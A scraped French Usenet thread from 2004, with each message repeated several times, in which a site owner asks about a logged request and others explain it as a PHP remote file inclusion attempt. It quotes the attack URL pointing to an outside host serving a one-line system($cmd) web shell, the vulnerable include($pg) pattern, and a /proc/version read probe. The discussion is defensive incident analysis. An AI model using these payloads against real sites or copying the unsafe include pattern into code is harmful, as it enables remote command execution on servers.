Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
Je vois cette nuit que quelqu'un est venu faire : http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
lftp :~> more "http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a" <? system($cmd); ?>
Un grand classique: tenter d'exploiter la faiblesse de votre script en essayant de faire inclure à php une page exterieure. Ici le script inclus execute toute commande passée en argument (cmd) ; pour tenter de connaitre le type de machine (uname -a)
Ici la tentative a échouée, car votre variable "pg" n'est priori pas vulnérable.
Ce serait différent si vous aviez fait dans votre script quelque chose comme:
<?php include($pg); ?>
Et après, http://www.XXXX.fr/index.php?pg=sommaire.php
Dans ce cas, un malveillant peut faire: http://www.XXXX.fr/index.php?pg=http://www.groslame.truc/monscript.php
Et dont executer SON code chez VOUS.
VarioFlux wrote:
Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
lftp :~> more "http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a"
<?
system($cmd);
?>
Un grand classique: tenter d'exploiter la faiblesse de votre script en
essayant de faire inclure à php une page exterieure.
Ici le script inclus execute toute commande passée en argument (cmd) ;
pour tenter de connaitre le type de machine (uname -a)
Ici la tentative a échouée, car votre variable "pg" n'est priori pas
vulnérable.
Ce serait différent si vous aviez fait dans votre script quelque chose
comme:
<?php
include($pg);
?>
Et après,
http://www.XXXX.fr/index.php?pg=sommaire.php
Dans ce cas, un malveillant peut faire:
http://www.XXXX.fr/index.php?pg=http://www.groslame.truc/monscript.php
Je vois cette nuit que quelqu'un est venu faire : http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
lftp :~> more "http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a" <? system($cmd); ?>
Un grand classique: tenter d'exploiter la faiblesse de votre script en essayant de faire inclure à php une page exterieure. Ici le script inclus execute toute commande passée en argument (cmd) ; pour tenter de connaitre le type de machine (uname -a)
Ici la tentative a échouée, car votre variable "pg" n'est priori pas vulnérable.
Ce serait différent si vous aviez fait dans votre script quelque chose comme:
<?php include($pg); ?>
Et après, http://www.XXXX.fr/index.php?pg=sommaire.php
Dans ce cas, un malveillant peut faire: http://www.XXXX.fr/index.php?pg=http://www.groslame.truc/monscript.php
Et dont executer SON code chez VOUS.
patpro
In article , VarioFlux wrote:
Bonjour,
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire : http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=una me%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Sans doute tenter d'injecter des commandes et de les faire executer sur ton serveur. Si le safe mode de PHP n'est pas activé, et que ton code php fait l'inclusion de ce qui est passé dans $pg sans rien vérifier, tu te retrouves avec un serveur sur lequel n'importe qui peut executer des commandes avec les privilèges d'apache. Et quand je parle de commande c'est commande système.
patpro
-- je cherche un poste d'admin UNIX/Mac http://patpro.net/cv.php
In article <mesnews.d1747d42.da9cac9b.279.7321@free.fr.avirer>,
VarioFlux <varioflux@free.fr.avirer> wrote:
Bonjour,
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=una
me%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
Sans doute tenter d'injecter des commandes et de les faire executer sur
ton serveur. Si le safe mode de PHP n'est pas activé, et que ton code
php fait l'inclusion de ce qui est passé dans $pg sans rien vérifier, tu
te retrouves avec un serveur sur lequel n'importe qui peut executer des
commandes avec les privilèges d'apache. Et quand je parle de commande
c'est commande système.
patpro
--
je cherche un poste d'admin UNIX/Mac
http://patpro.net/cv.php
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire : http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=una me%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Sans doute tenter d'injecter des commandes et de les faire executer sur ton serveur. Si le safe mode de PHP n'est pas activé, et que ton code php fait l'inclusion de ce qui est passé dans $pg sans rien vérifier, tu te retrouves avec un serveur sur lequel n'importe qui peut executer des commandes avec les privilèges d'apache. Et quand je parle de commande c'est commande système.
patpro
-- je cherche un poste d'admin UNIX/Mac http://patpro.net/cv.php
Cedric Blancher
Dans sa prose, VarioFlux nous ecrivait :
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
Mais c'est quoi la variable ? Le nom de la page ? Genre :
http://www.XXXX.fr/index.php?pg=fichier.html
Dans ce cas là, ce serait malheureusement banalement vulnérable... Ce genre de trou, c'est l'enfance de l'art de la programmation PHP...
Je vois cette nuit que quelqu'un est venu faire : http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Elle est passée l'attaque ? C'est quoi le résultat de la requête ?
Supposant que ta variable soit un nom de fichier que tu ouvres via un fopen dans ton script index.php, l'attaquant tente de charger un page web externe en supposant que tu n'aies pas désactivé le fopen_url_wrapper qui permet à un script PHP de charger une URL via la directive fopen. Si maintenant on regarde ce qu'il y a au bout de la page en question, il s'agit de ça :
<? system($cmd); ?>
Il espère que ce code va venir s'ajouter à ta page et qu'il pourra donc l'utiliser pour lancer des commandes sur ta machine, ici la commande "uname -a".
Ceci dit, je trouve sa méthode un peu maladroite. J'aurais fait un :
Sa méthode est en effet à mon sens trop dépendante de la méthode d'inclusion de la page distante dans le code courant. De plus, s'il y a effectivement directory traversal par inclusion sur la page, il aurait plus vite fait de lancer :
http://www.XXXX.fr/index.php?pg=/proc/version
Il tente donc d'exécuter du code dans ta page en supposant un directory traversal aggravé par un wrapper URL sur fopen. Maintenant, à toi de voir si ça a marché ou non et de prendre les mesures qui s'imposent.
-- BOFH excuse #238:
You did wha... oh _dear_....
Dans sa prose, VarioFlux nous ecrivait :
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et
le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque
là c'est banal.
Mais c'est quoi la variable ? Le nom de la page ? Genre :
http://www.XXXX.fr/index.php?pg=fichier.html
Dans ce cas là, ce serait malheureusement banalement vulnérable... Ce
genre de trou, c'est l'enfance de l'art de la programmation PHP...
Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
Elle est passée l'attaque ? C'est quoi le résultat de la requête ?
Supposant que ta variable soit un nom de fichier que tu ouvres via un
fopen dans ton script index.php, l'attaquant tente de charger un page web
externe en supposant que tu n'aies pas désactivé le fopen_url_wrapper
qui permet à un script PHP de charger une URL via la directive fopen. Si
maintenant on regarde ce qu'il y a au bout de la page en question, il
s'agit de ça :
<?
system($cmd);
?>
Il espère que ce code va venir s'ajouter à ta page et qu'il pourra donc
l'utiliser pour lancer des commandes sur ta machine, ici la commande
"uname -a".
Ceci dit, je trouve sa méthode un peu maladroite. J'aurais fait un :
Sa méthode est en effet à mon sens trop dépendante de la méthode
d'inclusion de la page distante dans le code courant. De plus, s'il y a
effectivement directory traversal par inclusion sur la page, il aurait
plus vite fait de lancer :
http://www.XXXX.fr/index.php?pg=/proc/version
Il tente donc d'exécuter du code dans ta page en supposant un directory
traversal aggravé par un wrapper URL sur fopen. Maintenant, à toi de
voir si ça a marché ou non et de prendre les mesures qui s'imposent.
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
Mais c'est quoi la variable ? Le nom de la page ? Genre :
http://www.XXXX.fr/index.php?pg=fichier.html
Dans ce cas là, ce serait malheureusement banalement vulnérable... Ce genre de trou, c'est l'enfance de l'art de la programmation PHP...
Je vois cette nuit que quelqu'un est venu faire : http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Elle est passée l'attaque ? C'est quoi le résultat de la requête ?
Supposant que ta variable soit un nom de fichier que tu ouvres via un fopen dans ton script index.php, l'attaquant tente de charger un page web externe en supposant que tu n'aies pas désactivé le fopen_url_wrapper qui permet à un script PHP de charger une URL via la directive fopen. Si maintenant on regarde ce qu'il y a au bout de la page en question, il s'agit de ça :
<? system($cmd); ?>
Il espère que ce code va venir s'ajouter à ta page et qu'il pourra donc l'utiliser pour lancer des commandes sur ta machine, ici la commande "uname -a".
Ceci dit, je trouve sa méthode un peu maladroite. J'aurais fait un :
Sa méthode est en effet à mon sens trop dépendante de la méthode d'inclusion de la page distante dans le code courant. De plus, s'il y a effectivement directory traversal par inclusion sur la page, il aurait plus vite fait de lancer :
http://www.XXXX.fr/index.php?pg=/proc/version
Il tente donc d'exécuter du code dans ta page en supposant un directory traversal aggravé par un wrapper URL sur fopen. Maintenant, à toi de voir si ça a marché ou non et de prendre les mesures qui s'imposent.
-- BOFH excuse #238:
You did wha... oh _dear_....
Sebastien Varrette
VarioFlux wrote:
Bonjour,
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire : http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Merci
le fichier http://www.dpalone.hpg.com.br/cmd.php contient le code suivant :
<? system($cmd); ?>
donc, il appelle l'execution de la commande donnée dans la variable $cmd, ici 'uname -a' qui fournit sous linux la version de kernel, le nombre de processeurs, la valeur de l'horloge système etc...
bref plein d'infos utiles.
VarioFlux wrote:
Bonjour,
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
Merci
le fichier http://www.dpalone.hpg.com.br/cmd.php contient le code suivant :
<?
system($cmd);
?>
donc, il appelle l'execution de la commande donnée dans la variable
$cmd, ici 'uname -a' qui fournit sous linux la version de kernel, le
nombre de processeurs, la valeur de l'horloge système etc...
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire : http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Merci
le fichier http://www.dpalone.hpg.com.br/cmd.php contient le code suivant :
<? system($cmd); ?>
donc, il appelle l'execution de la commande donnée dans la variable $cmd, ici 'uname -a' qui fournit sous linux la version de kernel, le nombre de processeurs, la valeur de l'horloge système etc...
Le visiteur espérait que ta page contienne une instruction du genre
include($pg);
Si ça avait été le cas, le visiteur en question aurait pu faire une inclusion de la page distante http://www.dpalone.hpg.com.br/cmd.php avec l'argument de son choix, et donc de faire appel a des commandes système sur ton serveur (ici "uname -a" pour obtenir la version du système).
Le visiteur espérait que ta page contienne une instruction du genre
include($pg);
Si ça avait été le cas, le visiteur en question aurait pu faire une
inclusion de la page distante http://www.dpalone.hpg.com.br/cmd.php avec
l'argument de son choix, et donc de faire appel a des commandes système sur
ton serveur (ici "uname -a" pour obtenir la version du système).
Le visiteur espérait que ta page contienne une instruction du genre
include($pg);
Si ça avait été le cas, le visiteur en question aurait pu faire une inclusion de la page distante http://www.dpalone.hpg.com.br/cmd.php avec l'argument de son choix, et donc de faire appel a des commandes système sur ton serveur (ici "uname -a" pour obtenir la version du système).
C'est donc bien une tentative d'intrusion.
-- Frédéric
VarioFlux
Cedric Blancher a couché sur son écran :
Elle est passée l'attaque ? C'est quoi le résultat de la requête ?
Je ne pense pas : je récupère le contenu de la variable par $_GET, je teste par un switch certaines valeurs prédéfinies sinon j'en impose une par défaut, ça me permet de remplir une valeur numérique et je déclenche des includes spécifiques par un switch sur la valeur numérique (qui gère aussi les valeurs et le "par défaut") de pages internes.
Par contre, je sais qu'il est venu grace à mon script de tracking, mais comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que chercher ?
Merci
Cedric Blancher a couché sur son écran :
Elle est passée l'attaque ? C'est quoi le résultat de la requête ?
Je ne pense pas : je récupère le contenu de la variable par $_GET, je
teste par un switch certaines valeurs prédéfinies sinon j'en impose une
par défaut, ça me permet de remplir une valeur numérique et je
déclenche des includes spécifiques par un switch sur la valeur
numérique (qui gère aussi les valeurs et le "par défaut") de pages
internes.
Par contre, je sais qu'il est venu grace à mon script de tracking, mais
comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que
chercher ?
Elle est passée l'attaque ? C'est quoi le résultat de la requête ?
Je ne pense pas : je récupère le contenu de la variable par $_GET, je teste par un switch certaines valeurs prédéfinies sinon j'en impose une par défaut, ça me permet de remplir une valeur numérique et je déclenche des includes spécifiques par un switch sur la valeur numérique (qui gère aussi les valeurs et le "par défaut") de pages internes.
Par contre, je sais qu'il est venu grace à mon script de tracking, mais comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que chercher ?
Merci
Philippe
lancer une commande : <? system($cmd); ?> et s'amuser avec ton serveur... "VarioFlux" a écrit dans le message de news:
Bonjour,
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Merci
lancer une commande :
<?
system($cmd);
?>
et s'amuser avec ton serveur... "VarioFlux" <varioflux@free.fr.avirer> a
écrit dans le message de
news:mesnews.d1747d42.da9cac9b.279.7321@free.fr.avirer...
Bonjour,
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
lancer une commande : <? system($cmd); ?> et s'amuser avec ton serveur... "VarioFlux" a écrit dans le message de news:
Bonjour,
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Merci
Pierre Goiffon
"VarioFlux" a écrit dans le message news:
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Quelqu'un de mal réveillé (vu l'heure ce serait humainement compréhensible) qui s'est trompé lors d'un copier/coller ? Mhhh ?
"VarioFlux" <varioflux@free.fr.avirer> a écrit dans le message news:
mesnews.d1747d42.da9cac9b.279.7321@free.fr.avirer...
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal.
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Quelqu'un de mal réveillé (vu l'heure ce serait humainement compréhensible) qui s'est trompé lors d'un copier/coller ? Mhhh ?
Emmanuel Florac
Le Thu, 26 Feb 2004 09:26:16 +0000, VarioFlux écrivait:
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Utiliser ton serveur comme "proxy anonymizer", peut-être pour mener une attaque, ou simplement pour ne pas se faire repérer.
-- De longs désirs, une longue admiration sans espérance, voilà le moyen d'adorer les femmes, et de rendre l'amour une passion délicieuse! N. Rétif de la Bretonne.
Le Thu, 26 Feb 2004 09:26:16 +0000, VarioFlux écrivait:
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
Utiliser ton serveur comme "proxy anonymizer", peut-être pour mener une
attaque, ou simplement pour ne pas se faire repérer.
--
De longs désirs, une longue admiration sans espérance, voilà le moyen
d'adorer les femmes, et de rendre l'amour une passion délicieuse!
N. Rétif de la Bretonne.
Le Thu, 26 Feb 2004 09:26:16 +0000, VarioFlux écrivait:
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait faire quelque chose, mais quoi ?
Utiliser ton serveur comme "proxy anonymizer", peut-être pour mener une attaque, ou simplement pour ne pas se faire repérer.
-- De longs désirs, une longue admiration sans espérance, voilà le moyen d'adorer les femmes, et de rendre l'amour une passion délicieuse! N. Rétif de la Bretonne.
Nicob
On Thu, 26 Feb 2004 10:35:40 +0000, VarioFlux wrote:
Je ne pense pas : je récupère le contenu de la variable par $_GET, je teste par un switch certaines valeurs prédéfinies sinon j'en impose une par défaut, ça me permet de remplir une valeur numérique et je déclenche des includes spécifiques par un switch sur la valeur numérique (qui gère aussi les valeurs et le "par défaut") de pages internes.
Sans vouloir être méchant : j'ai rien compris à cette explication.
Peux-tu copier/coller le code ou le mettre à dispo on-line (si bien sûr il n'est pas top-secret) afin de vérifier l'exploitabilité ?
Nicob
On Thu, 26 Feb 2004 10:35:40 +0000, VarioFlux wrote:
Je ne pense pas : je récupère le contenu de la variable par $_GET, je
teste par un switch certaines valeurs prédéfinies sinon j'en impose une
par défaut, ça me permet de remplir une valeur numérique et je
déclenche des includes spécifiques par un switch sur la valeur
numérique (qui gère aussi les valeurs et le "par défaut") de pages
internes.
Sans vouloir être méchant : j'ai rien compris à cette explication.
Peux-tu copier/coller le code ou le mettre à dispo on-line (si bien sûr
il n'est pas top-secret) afin de vérifier l'exploitabilité ?
On Thu, 26 Feb 2004 10:35:40 +0000, VarioFlux wrote:
Je ne pense pas : je récupère le contenu de la variable par $_GET, je teste par un switch certaines valeurs prédéfinies sinon j'en impose une par défaut, ça me permet de remplir une valeur numérique et je déclenche des includes spécifiques par un switch sur la valeur numérique (qui gère aussi les valeurs et le "par défaut") de pages internes.
Sans vouloir être méchant : j'ai rien compris à cette explication.
Peux-tu copier/coller le code ou le mettre à dispo on-line (si bien sûr il n'est pas top-secret) afin de vérifier l'exploitabilité ?
